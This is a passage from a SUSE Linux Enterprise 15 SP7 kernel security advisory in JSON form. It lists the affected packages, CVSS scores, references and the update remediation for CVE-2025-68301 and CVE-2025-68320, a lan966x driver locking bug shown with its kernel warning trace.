"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68301"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
